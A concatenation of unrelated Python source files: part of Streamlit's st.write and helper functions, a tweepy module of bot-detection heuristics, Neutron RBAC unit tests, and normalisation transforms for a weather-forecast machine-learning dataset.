- write(plotly_fig) : Displays a Plotly figure.
- write(bokeh_fig) : Displays a Bokeh figure.
- write(sympy_expr) : Prints SymPy expression using LaTeX.
unsafe_allow_html : bool
This is a keyword-only argument that defaults to False.
By default, any HTML tags found in strings will be escaped and
therefore treated as pure text. This behavior may be turned off by
setting this argument to True.
        That said, *we strongly advise against it*. It is hard to write secure
HTML, so by using this argument you may be compromising your users'
security. For more information, see:
https://github.com/streamlit/streamlit/issues/152
**Also note that `unsafe_allow_html` is a temporary measure and may be
removed from Streamlit at any time.**
If you decide to turn on HTML anyway, we ask you to please tell us your
exact use case here:
https://discuss.streamlit.io/t/96 .
This will help us come up with safe APIs that allow you to do what you
want.
Example
-------
Its simplest use case is to draw Markdown-formatted text, whenever the
input is a string:
>>> write('Hello, *World!* :sunglasses:')
.. output::
https://share.streamlit.io/0.50.2-ZWk9/index.html?id=Pn5sjhgNs4a8ZbiUoSTRxE
height: 50px
As mentioned earlier, `st.write()` also accepts other data formats, such as
numbers, data frames, styled data frames, and assorted objects:
>>> st.write(1234)
>>> st.write(pd.DataFrame({
... 'first column': [1, 2, 3, 4],
... 'second column': [10, 20, 30, 40],
... }))
.. output::
https://share.streamlit.io/0.25.0-2JkNY/index.html?id=FCp9AMJHwHRsWSiqMgUZGD
height: 250px
Finally, you can pass in multiple arguments to do things like:
>>> st.write('1 + 1 = ', 2)
>>> st.write('Below is a DataFrame:', data_frame, 'Above is a dataframe.')
.. output::
https://share.streamlit.io/0.25.0-2JkNY/index.html?id=DHkcU72sxYcGarkFbf4kK1
height: 300px
Oh, one more thing: `st.write` accepts chart objects too! For example:
>>> import pandas as pd
>>> import numpy as np
>>> import altair as alt
>>>
>>> df = pd.DataFrame(
... np.random.randn(200, 3),
... columns=['a', 'b', 'c'])
...
>>> c = alt.Chart(df).mark_circle().encode(
... x='a', y='b', size='c', color='c', tooltip=['a', 'b', 'c'])
>>>
>>> st.write(c)
.. output::
https://share.streamlit.io/0.25.0-2JkNY/index.html?id=8jmmXR8iKoZGV4kXaKGYV5
height: 200px
"""
try:
string_buffer = [] # type: List[str]
unsafe_allow_html = kwargs.get("unsafe_allow_html", False)
def flush_buffer():
if string_buffer:
markdown(
" ".join(string_buffer), unsafe_allow_html=unsafe_allow_html,
) # noqa: F821
string_buffer[:] = []
for arg in args:
# Order matters!
if isinstance(arg, str):
string_buffer.append(arg)
elif _type_util.is_dataframe_like(arg):
flush_buffer()
if len(_np.shape(arg)) > 2:
text(arg)
else:
dataframe(arg) # noqa: F821
elif isinstance(arg, Exception):
flush_buffer()
exception(arg) # noqa: F821
elif isinstance(arg, _HELP_TYPES):
flush_buffer()
help(arg)
elif _type_util.is_altair_chart(arg):
flush_buffer()
altair_chart(arg)
elif _type_util.is_type(arg, "matplotlib.figure.Figure"):
flush_buffer()
pyplot(arg)
elif _type_util.is_plotly_chart(arg):
flush_buffer()
plotly_chart(arg)
elif _type_util.is_type(arg, "bokeh.plotting.figure.Figure"):
flush_buffer()
bokeh_chart(arg)
elif _type_util.is_graphviz_chart(arg):
flush_buffer()
graphviz_chart(arg)
elif _type_util.is_sympy_expession(arg):
flush_buffer()
latex(arg)
elif _type_util.is_keras_model(arg):
from tensorflow.python.keras.utils import vis_utils
flush_buffer()
dot = vis_utils.model_to_dot(arg)
graphviz_chart(dot.to_string())
elif isinstance(arg, (dict, list)):
flush_buffer()
json(arg)
elif _type_util.is_namedtuple(arg):
flush_buffer()
json(_json.dumps(arg._asdict()))
elif _type_util.is_pydeck(arg):
flush_buffer()
pydeck_chart(arg)
else:
string_buffer.append("`%s`" % str(arg).replace("`", "\\`"))
flush_buffer()
except Exception:
_, exc, exc_tb = _sys.exc_info()
exception(exc, exc_tb) # noqa: F821
def experimental_show(*args):
"""Write arguments and *argument names* to your app for debugging purposes.
Show() has similar properties to write():
1. You can pass in multiple arguments, all of which will be debugged.
    2. It returns None, so its "slot" in the app cannot be reused.
Note: This is an experimental feature. See
https://docs.streamlit.io/en/latest/pre_release_features.html for more information.
Parameters
----------
*args : any
One or many objects to debug in the App.
Example
-------
>>> dataframe = pd.DataFrame({
... 'first column': [1, 2, 3, 4],
... 'second column': [10, 20, 30, 40],
... }))
>>> st.experimental_show(dataframe)
Notes
-----
This is an experimental feature with usage limitations:
- The method must be called with the name `show`.
- Must be called in one line of code, and only once per line.
- When passing multiple arguments the inclusion of `,` or `)` in a string
argument may cause an error.
"""
if not args:
return
try:
import inspect
# Get the calling line of code
current_frame = inspect.currentframe()
if current_frame is None:
warning("`show` not enabled in the shell")
return
lines = inspect.getframeinfo(current_frame.f_back)[3]
if not lines:
warning("`show` not enabled in the shell")
return
# Parse arguments from the line
line = lines[0].split("show", 1)[1]
inputs = _code_util.get_method_args_from_code(args, line)
# Escape markdown and add deltas
for idx, input in enumerate(inputs):
escaped = _string_util.escape_markdown(input)
markdown("**%s**" % escaped)
write(args[idx])
except Exception:
_, exc, exc_tb = _sys.exc_info()
exception(exc, exc_tb) # noqa: F821
@_contextlib.contextmanager
def spinner(text="In progress..."):
"""Temporarily displays a message while executing a block of code.
Parameters
----------
text : str
A message to display while executing that block
Example
-------
>>> with st.spinner('Wait for it...'):
>>> time.sleep(5)
>>> st.success('Done!')
"""
import streamlit.caching as caching
# @st.cache optionally uses spinner for long-running computations.
# Normally, streamlit warns the user when they call st functions
# from within an @st.cache'd function. But we do *not* want to show
# these warnings for spinner's message, so we create and mutate this
# message delta within the "suppress_cached_st_function_warning"
# context.
with caching.suppress_cached_st_function_warning():
message = empty()
try:
# Set the message 0.1 seconds in the future to avoid annoying
# flickering if this spinner runs too quickly.
DELAY_SECS = 0.1
display_message = True
display_message_lock = _threading.Lock()
def set_message():
with display_message_lock:
if display_message:
with caching.suppress_cached_st_function_warning():
message.warning(str(text))
_add_report_ctx(_threading.Timer(DELAY_SECS, set_message)).start()
# Yield control back to the context.
yield
finally:
if display_message_lock:
with display_message_lock:
display_message = False
with caching.suppress_cached_st_function_warning():
message.empty()
_SPACES_RE = _re.compile("\\s*")
@_contextlib.contextmanager
def echo(code_location="above"):
"""Use in a `with` block to draw some code on the app, then execute it.
Parameters
----------
code_location : "above" or "below"
Whether to show the echoed code before or after the results of the
executed code block.
Example
-------
>>> with st.echo():
>>> st.write('This code will be printed')
"""
if code_location == "below":
show_code = code
show_warning = warning
else:
placeholder = empty() # noqa: F821
show_code = placeholder.code
show_warning = placeholder.warning
try:
frame = _traceback.extract_stack()[-3]
filename, start_line = frame.filename, frame.lineno
yield
frame = _traceback.extract_stack()[-3]
end_line = frame.lineno
lines_to_display = [] # type: List[str]
with _source_util.open_python_file(filename) as source_file:
source_lines = source_file.readlines()
lines_to_display.extend(source_lines[start_line:end_line])
match = _SPACES_RE.match(lines_to_display[0])
initial_spaces = match.end() if match else 0
for line in source_lines[end_line:]:
match = _SPACES_RE.match(line)
indentation = match.end() if match else 0
# The != 1 is because we want to allow '\n' between sections.
if indentation != 1 and indentation < initial_spaces:
break
lines_to_display.append(line)
line_to_display = _textwrap.dedent("".join(lines_to_display))
show_code(line_to_display, "python")
except FileNotFoundError as err:
show_warning("Unable to display code. %s" % err)
def _transparent_write(*args):
"""This is just st.write, but returns the arguments you passed to it."""
write(*args)
if len(args) == 1:
return args[0]
return args
# We want to show a warning when the user runs a Streamlit script without
# 'streamlit run', but we need to make sure the warning appears only once no
# matter how many times __init__ gets loaded.
_repl_warning_has_been_displayed = False
def _maybe_print_repl_warning():
global _repl_warning_has_been_displayed
if not _repl_warning_has_been_displayed:
_repl_warning_has_been_displayed = True
if _env_util.is_repl():
_LOGGER.warning(
_textwrap.dedent(
"""
Will not generate Streamlit app
To generate an app, use Streamlit in a file and run it with:
$ streamlit run [FILE_NAME] [ARGUMENTS]
"""
)
)
elif _config.get_option("global.showWarningOnDirectExecution"):
script_name = _sys.argv[0]
_LOGGER.warning(
_textwrap.dedent(
"""
Will not generate Streamlit App
To generate an App, run this file with:
$ streamlit run %s [ARGUMENTS]
"""
),
script_name,
)
|
py | 1a306dccb8b41da09959fcc13ab1361f129ee05b | import tweepy
import csv
import time
import timeit
import datetime
import re
def tweetrate (listoftweets):
#Takes a list of tweets of type tweepy.cursor(api.user_timeline,...), returns [rate of tweets in tweets per day (including fractional), total number of tweets in dataset, and the time period of the sample as a timedelta]
tweet = []
for tweet1 in listoftweets:
tweet.append(tweet1.created_at)
length = len(tweet)
datebegin = tweet[0]
dateend = tweet[length-1]
return [(length-1)/((datebegin-dateend).days + (datebegin-dateend).seconds/86400), length, datebegin-dateend]
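# Illustrative usage (the api object and screen name are assumed, not part of this module):
#   timeline = tweepy.Cursor(api.user_timeline, screen_name="some_user").items(200)
#   rate_per_day, n_tweets, span = tweetrate(list(timeline))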
def maybe_enum (list, keep="off"):
#Checks to see which of a list of user names end in a sequence of numbers, possibly indicating that a username was automatically generated in sequence.
#
#An example of this might be a number of accounts that look like "chair02003", "book20031", "world60063" - a clear pattern of words followed by 5 digit sequences.
    #Of course, there are a bunch of reasons people put numbers in their names organically-- "Trump2020". "SexySince1979". "n1ckn4m3", etc.
#
#By default, maybe_enum returns a 2d list where list[x] = [user name, digit at end of username], ignoring all usernames that don't end in digits.
#If the variable 'keep' is set to "on" - i.e., calling it as maybe_enum(list,"on") - it won't ignore the usernames that don't end in digits, but instead handle those like this: ["nodigit", -1]
outlist = []
for user in list:
enum = re.search(r'\d+$', user)
if enum is not None:
outlist.append([user, enum.group()])
else:
if keep == "on":
outlist.append([user, -1])
return outlist
def enum_sort (enums):
#maybe you'd rather see your "maybe_enum" list in terms of how many names ended in sequences of digits of length (n). This will do that! Every outlist [n] = [total number of usernames ending in a sequence of length n, list of names fitting that criteria]
outlist = [[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]]]
for userstat in enums:
outlist[len(userstat[1])][1].append(userstat[0])
outlist[len(userstat[1])][0] = outlist[len(userstat[1])][0] + 1
return outlist
def hasfollowers (user, thresh = 1):
#takes a user of type api.get_user(user) and checks if it has at least 'thresh' number of followers. If no thresh is given, defaults to 1
if user.friends_count > thresh:
return (0)
else:
return (1)
def hastweeted (listoftweets, thresh=1):
    #Takes a list of tweets of type tweepy.Cursor(api.user_timeline...) and tells you if the account has tweeted at least thresh times (thresh defaults to 1)
tweet = []
for tweet1 in listoftweets:
tweet.append (tweet1)
if len(tweet) > thresh:
return (1)
else:
return (0)
def rate_limiter(api):
#This function checks if you've hit any twitter API limits. If you have, this module will pause your program until the limits reset,
#checking every 60 seconds to see if they have.
# DUMMY CODE FOR TWEEPY ERROR HANDLING
#try:
# [Tweepy API Call]
#except tweepy.error.RateLimitError:
# rate_limit_check()
    while True:
        # Re-fetch the limits on every pass so the loop can observe a reset.
        rate_limit = api.rate_limit_status()["resources"]
        exhausted = False
        for rate in rate_limit:
            endpoints = rate_limit[rate]
            for endpoint in endpoints:
                remaining = endpoints[endpoint]["remaining"]
                if remaining == 0:
                    exhausted = True
        if exhausted:
            time.sleep(60)
        else:
            return
|
py | 1a306e594e2f2150ce955d3b38129b1e11f93425 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from neutron_lib.callbacks import events
from neutron_lib import context as n_context
from neutron_lib.db import model_base
from neutron_lib import exceptions as n_exc
from neutron_lib.objects import common_types
from oslo_versionedobjects import fields as obj_fields
import sqlalchemy as sa
from neutron.db import rbac_db_models
from neutron.extensions import rbac as ext_rbac
from neutron.objects import base
from neutron.objects.db import api as obj_db_api
from neutron.objects import rbac_db
from neutron.tests.unit.objects import test_rbac
from neutron.tests.unit import testlib_api
class FakeDbModel(dict):
pass
class FakeRbacModel(rbac_db_models.RBACColumns, model_base.BASEV2):
object_id = sa.Column(sa.String(36), nullable=False)
object_type = 'fake_rbac_object'
def get_valid_actions(self):
return (rbac_db_models.ACCESS_SHARED,)
@base.NeutronObjectRegistry.register_if(False)
class FakeNeutronRbacObject(base.NeutronDbObject):
VERSION = '1.0'
db_model = FakeRbacModel
fields = {
'object_id': obj_fields.StringField(),
'target_tenant': obj_fields.StringField(),
'action': obj_fields.StringField(),
}
@base.NeutronObjectRegistry.register_if(False)
class FakeNeutronDbObject(rbac_db.NeutronRbacObject):
# Version 1.0: Initial version
VERSION = '1.0'
rbac_db_cls = FakeNeutronRbacObject
db_model = FakeDbModel
fields = {
'id': common_types.UUIDField(),
'field1': obj_fields.StringField(),
'field2': obj_fields.StringField(),
'shared': obj_fields.BooleanField(default=False),
}
fields_no_update = ['id']
synthetic_fields = ['field2']
def get_bound_project_ids(cls, context, policy_id):
pass
class RbacNeutronDbObjectTestCase(test_rbac.RBACBaseObjectIfaceTestCase,
testlib_api.SqlTestCase):
_test_class = FakeNeutronDbObject
def setUp(self):
super(RbacNeutronDbObjectTestCase, self).setUp()
FakeNeutronDbObject.update_post = mock.Mock()
@mock.patch.object(_test_class.rbac_db_cls, 'db_model')
def test_get_projects_with_shared_access_to_db_obj_return_project_ids(
self, *mocks):
ctx = mock.Mock()
fake_ids = {'project_id_' + str(i) for i in range(10)}
ctx.session.query.return_value.filter.return_value = [
(fake_id,) for fake_id in fake_ids]
ret_ids = self._test_class._get_projects_with_shared_access_to_db_obj(
ctx, 'fake_db_obj_id')
self.assertEqual(fake_ids, ret_ids)
def test_is_accessible_for_admin(self):
ctx = mock.Mock(is_admin=True, project_id='we_dont_care')
self.assertTrue(self._test_class.is_accessible(ctx, None))
def test_is_accessible_for_db_object_owner(self):
ctx = mock.Mock(is_admin=False, project_id='db_object_owner')
db_obj = mock.Mock(project_id=ctx.project_id)
self.assertTrue(self._test_class.is_accessible(ctx, db_obj))
@mock.patch.object(_test_class, 'is_shared_with_project',
return_value=True)
def test_is_accessible_if_shared_with_project(self, mock_is_shared):
ctx = mock.Mock(is_admin=False, project_id='db_object_shareholder')
db_obj = mock.Mock(project_id='db_object_owner')
self.assertTrue(self._test_class.is_accessible(ctx, db_obj))
mock_is_shared.assert_called_once_with(
mock.ANY, db_obj.id, ctx.project_id)
@mock.patch.object(_test_class, 'is_shared_with_project',
return_value=False)
def test_is_accessible_fails_for_unauthorized_project(self,
mock_is_shared):
ctx = mock.Mock(is_admin=False, project_id='Billy_the_kid')
db_obj = mock.Mock(project_id='db_object_owner')
self.assertFalse(self._test_class.is_accessible(ctx, db_obj))
mock_is_shared.assert_called_once_with(
mock.ANY, db_obj.id, ctx.project_id)
def _rbac_policy_generate_change_events(self, resource, trigger,
context, object_type, policy,
event_list):
for event in event_list:
payload = events.DBEventPayload(
context, states=(policy,),
metadata={'object_type': object_type})
if event == events.BEFORE_CREATE:
payload.states = []
payload.request_body = policy
self._test_class.validate_rbac_policy_change(
resource, event, trigger, payload=payload)
@mock.patch.object(_test_class, 'validate_rbac_policy_update')
def test_validate_rbac_policy_change_handles_only_object_type(
self, mock_validate_rbac_update):
self._rbac_policy_generate_change_events(
resource=None, trigger='dummy_trigger', context=None,
object_type='dummy_object_type', policy=None,
event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE,
events.BEFORE_DELETE))
mock_validate_rbac_update.assert_not_called()
@mock.patch.object(_test_class, 'validate_rbac_policy_update')
@mock.patch.object(obj_db_api, 'get_object',
return_value={'project_id': 'tyrion_lannister'})
def test_validate_rbac_policy_change_allowed_for_admin_or_owner(
self, mock_get_object, mock_validate_update):
context = mock.Mock(is_admin=True, project_id='db_obj_owner_id')
self._rbac_policy_generate_change_events(
resource=None, trigger='dummy_trigger', context=context,
object_type=self._test_class.rbac_db_cls.db_model.object_type,
policy={'object_id': 'fake_object_id'},
event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE))
self.assertTrue(self._test_class.validate_rbac_policy_update.called)
@mock.patch.object(_test_class, 'validate_rbac_policy_update')
@mock.patch.object(obj_db_api, 'get_object',
return_value={'project_id': 'king_beyond_the_wall'})
def test_validate_rbac_policy_change_forbidden_for_outsiders(
self, mock_get_object, mock_validate_update):
context = mock.Mock(is_admin=False, project_id='db_obj_owner_id')
self.assertRaises(
n_exc.InvalidInput,
self._rbac_policy_generate_change_events,
resource=mock.Mock(), trigger='dummy_trigger', context=context,
object_type=self._test_class.rbac_db_cls.db_model.object_type,
policy={'object_id': 'fake_object_id'},
event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE))
self.assertFalse(mock_validate_update.called)
@mock.patch.object(_test_class, '_validate_rbac_policy_delete')
def _test_validate_rbac_policy_delete_handles_policy(
self, policy, mock_validate_delete):
payload = events.DBEventPayload(
n_context.get_admin_context(),
states=(policy,),
metadata={
'object_type':
self._test_class.rbac_db_cls.db_model.object_type})
self._test_class.validate_rbac_policy_delete(
resource=mock.Mock(), event=events.BEFORE_DELETE,
trigger='dummy_trigger', payload=payload)
mock_validate_delete.assert_not_called()
def test_validate_rbac_policy_delete_handles_shared_action(self):
self._test_validate_rbac_policy_delete_handles_policy(
{'action': 'unknown_action'})
@mock.patch.object(obj_db_api, 'get_object')
def test_validate_rbac_policy_delete_skips_db_object_owner(self,
mock_get_object):
policy = {'action': rbac_db_models.ACCESS_SHARED,
'target_tenant': 'fake_project_id',
'object_id': 'fake_obj_id',
'project_id': 'fake_project_id'}
mock_get_object.return_value.project_id = policy['target_tenant']
self._test_validate_rbac_policy_delete_handles_policy(policy)
@mock.patch.object(obj_db_api, 'get_object')
@mock.patch.object(_test_class, 'get_bound_project_ids',
return_value='project_id_shared_with')
def test_validate_rbac_policy_delete_fails_single_project_and_in_use(
self, get_bound_project_ids_mock, mock_get_object):
policy = {'action': rbac_db_models.ACCESS_SHARED,
'target_tenant': 'project_id_shared_with',
'project_id': 'object_owner_project_id',
'object_id': 'fake_obj_id'}
context = mock.Mock()
with mock.patch.object(
self._test_class,
'_get_db_obj_rbac_entries') as target_tenants_mock:
filter_mock = target_tenants_mock.return_value.filter
filter_mock.return_value.count.return_value = 0
payload = events.DBEventPayload(
context,
states=(policy,),
metadata={
'object_type':
self._test_class.rbac_db_cls.db_model.object_type})
self.assertRaises(
ext_rbac.RbacPolicyInUse,
self._test_class.validate_rbac_policy_delete,
resource=None,
event=events.BEFORE_DELETE,
trigger='dummy_trigger',
payload=payload)
def test_validate_rbac_policy_delete_not_bound_project_success(self):
context = mock.Mock()
with mock.patch.object(
self._test_class, 'get_bound_project_ids',
return_value={'fake_tid2', 'fake_tid3'}), \
mock.patch.object(self._test_class,
'_get_db_obj_rbac_entries') as get_rbac_entries_mock, \
mock.patch.object(
self._test_class,
'_get_projects_with_shared_access_to_db_obj') as sh_tids:
get_rbac_entries_mock.filter.return_value.count.return_value = 0
self._test_class._validate_rbac_policy_delete(
context=context,
obj_id='fake_obj_id',
target_tenant='fake_tid1')
sh_tids.assert_not_called()
@mock.patch.object(_test_class, '_get_db_obj_rbac_entries')
@mock.patch.object(_test_class,
'_get_projects_with_shared_access_to_db_obj',
return_value=['some_other_project'])
@mock.patch.object(_test_class, 'get_bound_project_ids',
return_value={'fake_id1'})
def test_validate_rbac_policy_delete_fails_single_used_wildcarded(
self, get_bound_project_ids_mock, mock_projects_with_shared_access,
_get_db_obj_rbac_entries_mock):
policy = {'action': rbac_db_models.ACCESS_SHARED,
'target_tenant': '*',
'project_id': 'object_owner_project_id',
'object_id': 'fake_obj_id'}
context = mock.Mock()
payload = events.DBEventPayload(
context,
states=(policy,),
metadata={
'object_type':
self._test_class.rbac_db_cls.db_model.object_type})
with mock.patch.object(obj_db_api, 'get_object'):
self.assertRaises(
ext_rbac.RbacPolicyInUse,
self._test_class.validate_rbac_policy_delete,
resource=mock.Mock(),
event=events.BEFORE_DELETE,
trigger='dummy_trigger',
payload=payload)
@mock.patch.object(_test_class, 'attach_rbac')
@mock.patch.object(obj_db_api, 'get_object',
return_value=['fake_rbac_policy'])
@mock.patch.object(_test_class, '_validate_rbac_policy_delete')
def test_update_shared_avoid_duplicate_update(
self, mock_validate_delete, get_object_mock, attach_rbac_mock):
obj_id = 'fake_obj_id'
obj = self._test_class(mock.Mock())
obj.update_shared(is_shared_new=True, obj_id=obj_id)
get_object_mock.assert_called_with(
obj.rbac_db_cls, mock.ANY, object_id=obj_id,
target_tenant='*', action=rbac_db_models.ACCESS_SHARED)
self.assertFalse(mock_validate_delete.called)
self.assertFalse(attach_rbac_mock.called)
@mock.patch.object(_test_class, 'attach_rbac')
@mock.patch.object(obj_db_api, 'get_object', return_value=[])
@mock.patch.object(_test_class, '_validate_rbac_policy_delete')
def test_update_shared_wildcard(
self, mock_validate_delete, get_object_mock, attach_rbac_mock):
obj_id = 'fake_obj_id'
test_neutron_obj = self._test_class(mock.Mock())
test_neutron_obj.update_shared(is_shared_new=True, obj_id=obj_id)
get_object_mock.assert_called_with(
test_neutron_obj.rbac_db_cls, mock.ANY, object_id=obj_id,
target_tenant='*', action=rbac_db_models.ACCESS_SHARED)
attach_rbac_mock.assert_called_with(
obj_id, test_neutron_obj.obj_context.project_id)
def test_shared_field_false_without_context(self):
test_neutron_obj = self._test_class()
self.assertFalse(test_neutron_obj.to_dict()['shared'])
@mock.patch.object(_test_class, 'attach_rbac')
@mock.patch.object(obj_db_api, 'get_object',
return_value=['fake_rbac_policy'])
@mock.patch.object(_test_class, '_validate_rbac_policy_delete')
def test_update_shared_remove_wildcard_sharing(
self, mock_validate_delete, get_object_mock, attach_rbac_mock):
obj_id = 'fake_obj_id'
obj = self._test_class(mock.Mock())
obj.update_shared(is_shared_new=False, obj_id=obj_id)
get_object_mock.assert_called_with(
obj.rbac_db_cls, mock.ANY, object_id=obj_id,
target_tenant='*', action=rbac_db_models.ACCESS_SHARED)
self.assertFalse(attach_rbac_mock.attach_rbac.called)
mock_validate_delete.assert_called_with(mock.ANY, obj_id, '*')
@mock.patch.object(_test_class, 'create_rbac_policy')
def test_attach_rbac_returns_type(self, create_rbac_mock):
obj_id = 'fake_obj_id'
project_id = 'fake_project_id'
target_tenant = 'fake_target_project'
self._test_class(mock.Mock()).attach_rbac(obj_id, project_id,
target_tenant)
rbac_pol = create_rbac_mock.call_args_list[0][0][1]['rbac_policy']
self.assertEqual(rbac_pol['object_id'], obj_id)
self.assertEqual(rbac_pol['target_tenant'], target_tenant)
self.assertEqual(rbac_pol['action'], rbac_db_models.ACCESS_SHARED)
self.assertEqual(rbac_pol['object_type'],
self._test_class.rbac_db_cls.db_model.object_type)
|
py | 1a306f6dbf62485a1faeac3dfb2b6ee640b6a2b7 | """Various constants and distributions that describe our dataset. Intended use
is normalization of the fields before sending them to a neural net.
See notebook distributions-of-parameters.ipynb"""
import logging
import numpy as np
import torch
import random
import xarray as xr
from .util import add_biweekly_dim, obs_to_biweekly, std_estimator, fix_s2s_dataset_dims
_logger = logging.getLogger(__name__)
FIELD_MEAN = {
"gh10": 30583.0,
"gh100": 16070.0,
"gh1000": 76.19,
"gh200": 11765.0,
"gh500": 5524.374,
"gh850": 1403.0,
"lsm": 0.0,
"msl": 100969.28,
"orog": 387.1,
"siconc": 0.17,
"sst": 286.96,
"st100": 268.75,
"st20": 268.69,
"sm20": 250.68,
"t2m": 278.2237,
"tp": 34.1,
"u1000": -0.17,
"u850": 1.26,
"u500": 6.43,
"u200": 14.43,
"u100": 5.30,
"v1000": 0.18,
"v850": 0.11,
"v500": -0.03,
"v200": -0.01,
"v100": 0.10,
}
FIELD_STD = {
"gh10": 993.0,
"gh100": 577.0,
"gh1000": 110.14,
"gh200": 605.0,
"gh500": 341.80862,
"gh850": 149.6,
"lsm": 1.0,
"msl": 1343.6,
"orog": 856.0,
"siconc": 0.35,
"sst": 11.73,
"st100": 26.74,
"st20": 26.91,
"sm20": 125.99,
"tp": 43.7,
"t2m": 21.2692,
"u1000": 6.09,
"u850": 8.07,
"u500": 11.73,
"u200": 17.76,
"u100": 12.02,
"v1000": 5.22,
"v850": 6.144,
"v500": 9.03,
"v200": 12.18,
"v100": 6.57,
}
def normalize_dataset(dataset):
for v in dataset.data_vars:
dataset[v] = (dataset[v] - FIELD_MEAN[v]) / FIELD_STD[v]
return dataset
def denormalize_dataset(dataset):
for v in dataset.data_vars:
dataset[v] = (dataset[v] * FIELD_STD[v]) + FIELD_MEAN[v]
return dataset
def apply_to_all(transform, example):
"""Utility function to apply a transform on all the kews of an example."""
new_example = {}
for k in example:
new_example[k] = transform(example[k])
return new_example
class AddBiweeklyDimTransform:
"""Transform that takes a training example and adds the biweekly dimension to it."""
def __init__(self, weeks_12=False, features=False):
self.weeks_12 = weeks_12
self.features = features
def __call__(self, example):
to_transform = ["model", "obs"]
if self.features:
to_transform.append("features")
new_example = {}
for k in example:
if k in to_transform:
new_example[k] = add_biweekly_dim(example[k], weeks_12=self.weeks_12)
else:
new_example[k] = example[k]
return new_example
class AddMetadata:
"""Add various metadata to the example dict."""
def __call__(self, example):
model = example["terciles"]
year = int(model.forecast_time.dt.year)
month = int(model.forecast_time.dt.month)
day = int(model.forecast_time.dt.day)
example["monthday"] = f"{month:02}{day:02}"
example["month"] = f"{month:02}"
example["year"] = f"{year:04}"
example["latitude"] = model.latitude
example["longitude"] = model.longitude
return example
class AddDryMask:
def __init__(self, threshold=0.01):
self.threshold = threshold
def __call__(self, example):
edges = example["edges"]
wet_mask = (edges.isel(category_edge=0) > self.threshold).drop("t2m")
example["dry_mask"] = ~wet_mask
return example
class ExampleToPytorch:
def __call__(self, example):
pytorch_example = {}
for dataset_name in [
"obs",
"model",
"features",
"terciles",
"edges",
"model_parameters",
"dry_mask",
"eccc_parameters",
"ncep_parameters",
]:
if dataset_name in example:
dataset = example[dataset_name]
for variable in dataset.data_vars:
new_key = f"{dataset_name}_{variable}"
pytorch_example[new_key] = torch.from_numpy(dataset[variable].data)
for k in ["year", "monthday", "month", "eccc_available", "ncep_available"]:
pytorch_example[k] = example[k]
for k in ["latitude", "longitude"]:
pytorch_example[k] = torch.from_numpy(example[k].data)
return pytorch_example
class CompositeTransform:
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, example):
transformed_example = example
for t in self.transforms:
transformed_example = t(transformed_example)
return transformed_example
def __repr__(self):
inner_str = ", ".join([repr(t) for t in self.transforms])
return f"CompositeTransform([{inner_str}])"
def t2m_to_normal(model):
model_t2m_mean = model.t2m.mean(dim=["lead_time", "realization"]).rename("t2m_mu")
model_t2m_std = std_estimator(model.t2m, dim=["lead_time", "realization"]).rename(
"t2m_sigma"
)
return xr.merge([model_t2m_mean, model_t2m_std]).rename(
biweekly_forecast="lead_time"
)
def tp_to_normal(model):
model_tp_mean = model.tp.isel(lead_time=-1).mean(dim="realization").rename("tp_mu")
model_tp_std = std_estimator(model.tp.isel(lead_time=-1), dim="realization").rename(
"tp_sigma"
)
return (
xr.merge([model_tp_mean, model_tp_std])
.drop("lead_time")
.rename(biweekly_forecast="lead_time")
)
def model_to_distribution(model):
model_t2m = t2m_to_normal(model)
model_tp = tp_to_normal(model)
return xr.merge([model_t2m, model_tp])
class LinearModelAdapter:
def __init__(self, make_distributions=True):
self.make_distributions = make_distributions
def __call__(self, example):
if self.make_distributions:
example["model"] = model_to_distribution(example["model"])
example["obs"] = obs_to_biweekly(example["obs"])
return example
class CubeRootTP:
"""Apply a cubic root on precipitation data."""
def __init__(self):
pass
def __call__(self, example):
for k in ["obs_tp", "edges_tp"]:
if k in example:
example[k] = example[k] ** (1.0 / 3.0)
return example
class AddLatLonFeature:
def __init__(self):
pass
def __call__(self, example):
obs = example["terciles"]
lat_array = obs["latitude"].assign_coords(variable="lat")
lat_array = (lat_array / lat_array.max()).astype("float32")
lon_array = obs["longitude"].assign_coords(variable="lon")
lon_array = np.sin(np.deg2rad(lon_array)).astype("float32")
features_array = example["features"].features
catted_features = xr.concat(
[features_array, lat_array, lon_array], dim="variable"
)
example["features"] = catted_features.to_dataset()
return example
class AddGeographyFeatures:
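    """Append normalized orography features read from a geography file to the feature set."""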
def __init__(self, geography_file):
geo_dataset = fix_s2s_dataset_dims(xr.open_dataset(geography_file))
subset = geo_dataset[["orog"]]
geo = normalize_dataset(subset)
self.geo_features = geo.to_array().to_dataset(name="features")
def __call__(self, batch):
features = batch["features"]
geo_at_lead = self.geo_features.sel(lead_time=features.lead_time)
new_features_dataset = xr.concat([features, geo_at_lead], dim="variable")
batch["features"] = new_features_dataset
return batch
class RandomNoise:
def __init__(self, keys=["features_features"], sigma=0.01):
self.keys = keys
self.sigma = sigma
def __call__(self, example):
for k in self.keys:
x = example[k]
example[k] += self.sigma * torch.randn_like(x)
return example
class LongitudeRoll:
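    """Randomly roll every dataset of the example along the longitude dimension (simple data augmentation)."""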
def __init__(self):
pass
def __call__(self, example):
obs = example["terciles"]
longitude_length = obs.sizes["longitude"]
roll = random.randint(0, longitude_length)
rolled_example = example
for k in example:
if k not in ["eccc_available", "ncep_available"]:
rolled_dataset = (
example[k].roll(longitude=roll, roll_coords=True).drop("longitude")
)
rolled_example[k] = rolled_dataset
return rolled_example
class MembersSubsetTransform:
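    """Randomly select a subset of ensemble members (realizations) from the features."""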
def __init__(self, subset_size=1):
self.subset_size = subset_size
def __call__(self, example):
features = example["features"]
n_members = features.sizes["realization"]
members = sorted(random.choices(range(n_members), k=self.subset_size))
features = features.isel(realization=members)
example["features"] = features
return example
class AddDateFeatureTransform:
def __call__(self, example):
features = example["features"]
date_features = np.sin(
features.valid_time.assign_coords(variable="date").dt.dayofyear / 366
)
new_features = xr.concat(
[features.features, date_features], dim="variable"
).astype("float32")
example["features"] = new_features.to_dataset()
